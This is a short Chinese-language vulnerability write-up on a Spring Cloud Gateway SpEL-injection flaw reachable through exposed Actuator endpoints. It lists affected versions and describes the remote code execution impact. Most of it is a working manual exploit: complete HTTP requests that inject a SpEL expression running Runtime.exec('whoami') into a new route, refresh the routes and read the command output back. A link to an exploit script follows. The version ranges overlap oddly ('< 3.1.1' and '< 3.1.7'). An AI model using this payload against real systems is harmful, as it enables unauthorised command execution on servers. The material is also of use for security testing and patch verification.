原理

启用和暴露Gateway Actuator端点时，可用恶意的SpEL表达式被嵌入路由路径，在刷新路由时导致RCE。

参考文章：
https://blog.csdn.net/m0_61506558/article/details/126914956

影响范围

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.1.7
Spring Cloud Gateway 2.x

危害

远程攻击者可利用该漏洞可以发出恶意的请求，允许在远程主机上执行任意远程命令。

POC & EXP

手工

# 1. 请求http://x.x.x.x:x/actuator，确认端口开启

# 2. 新建一个路由，注入恶意的SpELl表达式，返回状态码应为201 Created
POST /actuator/gateway/routes/test HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type:application/json
Content-Length: 298

{"id": "test","filters": [{"name": "AddResponseHeader","args": {"value":"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}","name": "cmd"}}],"uri": "http://example.com:80","order": 0 }

# 3. 刷新路由表
POST /actuator/gateway/refresh HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

a=1

# 4. 访问刚刚建立的路由，http://x.x.x.x:x/actuator/gateway/routes/test

脚本

https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947